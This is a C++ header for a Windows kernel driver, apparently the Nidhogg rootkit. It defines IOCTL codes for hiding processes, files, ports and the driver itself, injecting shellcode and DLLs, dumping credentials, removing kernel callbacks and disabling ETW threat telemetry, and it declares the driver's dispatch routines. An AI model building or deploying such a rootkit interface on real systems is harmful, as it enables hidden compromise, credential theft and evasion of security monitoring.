#pragma once
#include "pch.h"
#include "MemoryHelper.hpp"
#include "MemoryAllocator.hpp"
#include "ProcessHandler.h"
#include "ThreadHandler.h"
#include "MemoryUtils.h"
#include "FileUtils.h"
#include "RegistryUtils.h"
#include "AntiAnalysis.h"
#include "NetworkUtils.h"
#include "ScriptManager.h"

// ** IOCTLS **********************************************************************************************
constexpr ULONG IOCTL_PROTECT_UNPROTECT_PROCESS = static_cast<ULONG>(CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_CLEAR_PROCESSES = static_cast<ULONG>(CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_HIDE_UNHIDE_PROCESS = static_cast<ULONG>(CTL_CODE(0x8000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_ELEVATE_PROCESS = static_cast<ULONG>(CTL_CODE(0x8000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_SET_PROCESS_SIGNATURE_LEVEL = static_cast<ULONG>(CTL_CODE(0x8000, 0x804, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_LIST_PROCESSES = static_cast<ULONG>(CTL_CODE(0x8000, 0x805, METHOD_BUFFERED, FILE_ANY_ACCESS));

constexpr ULONG IOCTL_PROTECT_UNPROTECT_THREAD = static_cast<ULONG>(CTL_CODE(0x8000, 0x806, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_CLEAR_THREADS = static_cast<ULONG>(CTL_CODE(0x8000, 0x807, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_HIDE_UNHIDE_THREAD = static_cast<ULONG>(CTL_CODE(0x8000, 0x808, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_LIST_THREADS = static_cast<ULONG>(CTL_CODE(0x8000, 0x809, METHOD_BUFFERED, FILE_ANY_ACCESS));

constexpr ULONG IOCTL_PROTECT_UNPROTECT_FILE = static_cast<ULONG>(CTL_CODE(0x8000, 0x80A, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_CLEAR_PROTECTED_FILES = static_cast<ULONG>(CTL_CODE(0x8000, 0x80B, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_LIST_FILES = static_cast<ULONG>(CTL_CODE(0x8000, 0x80C, METHOD_BUFFERED, FILE_ANY_ACCESS));

constexpr ULONG IOCTL_PROTECT_REGITEM = static_cast<ULONG>(CTL_CODE(0x8000, 0x80D, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_UNPROTECT_REGITEM = static_cast<ULONG>(CTL_CODE(0x8000, 0x80E, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_CLEAR_REGITEMS = static_cast<ULONG>(CTL_CODE(0x8000, 0x80F, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_LIST_REGITEMS = static_cast<ULONG>(CTL_CODE(0x8000, 0x810, METHOD_BUFFERED, FILE_ANY_ACCESS));

constexpr ULONG IOCTL_PATCH_MODULE = static_cast<ULONG>(CTL_CODE(0x8000, 0x811, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_INJECT_SHELLCODE = static_cast<ULONG>(CTL_CODE(0x8000, 0x812, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_INJECT_DLL = static_cast<ULONG>(CTL_CODE(0x8000, 0x813, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_HIDE_MODULE = static_cast<ULONG>(CTL_CODE(0x8000, 0x814, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_HIDE_UNHIDE_DRIVER = static_cast<ULONG>(CTL_CODE(0x8000, 0x815, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_DUMP_CREDENTIALS = static_cast<ULONG>(CTL_CODE(0x8000, 0x816, METHOD_BUFFERED, FILE_ANY_ACCESS));

constexpr ULONG IOCTL_LIST_OBCALLBACKS = static_cast<ULONG>(CTL_CODE(0x8000, 0x817, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_LIST_PSROUTINES = static_cast<ULONG>(CTL_CODE(0x8000, 0x818, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_LIST_REGCALLBACKS = static_cast<ULONG>(CTL_CODE(0x8000, 0x819, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_REMOVE_RESTORE_CALLBACK = static_cast<ULONG>(CTL_CODE(0x8000, 0x81A, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_ENABLE_DISABLE_ETWTI = static_cast<ULONG>(CTL_CODE(0x8000, 0x81B, METHOD_BUFFERED, FILE_ANY_ACCESS));

constexpr ULONG IOCTL_HIDE_UNHIDE_PORT = static_cast<ULONG>(CTL_CODE(0x8000, 0x81C, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_CLEAR_HIDDEN_PORTS = static_cast<ULONG>(CTL_CODE(0x8000, 0x81D, METHOD_BUFFERED, FILE_ANY_ACCESS));
constexpr ULONG IOCTL_QUERY_HIDDEN_PORTS = static_cast<ULONG>(CTL_CODE(0x8000, 0x81E, METHOD_BUFFERED, FILE_ANY_ACCESS));

constexpr ULONG IOCTL_EXEC_SCRIPT = static_cast<ULONG>(CTL_CODE(0x8000, 0x81F, METHOD_BUFFERED, FILE_ANY_ACCESS));
// *******************************************************************************************************

_IRQL_requires_max_(DISPATCH_LEVEL)
_IRQL_requires_same_
NTSTATUS NidhoggCreateClose(_Inout_ PDEVICE_OBJECT DeviceObject, _Inout_ PIRP Irp);

_IRQL_requires_max_(DISPATCH_LEVEL)
_IRQL_requires_same_
NTSTATUS NidhoggDeviceControl(_Inout_ PDEVICE_OBJECT DeviceObject, _Inout_ PIRP Irp);
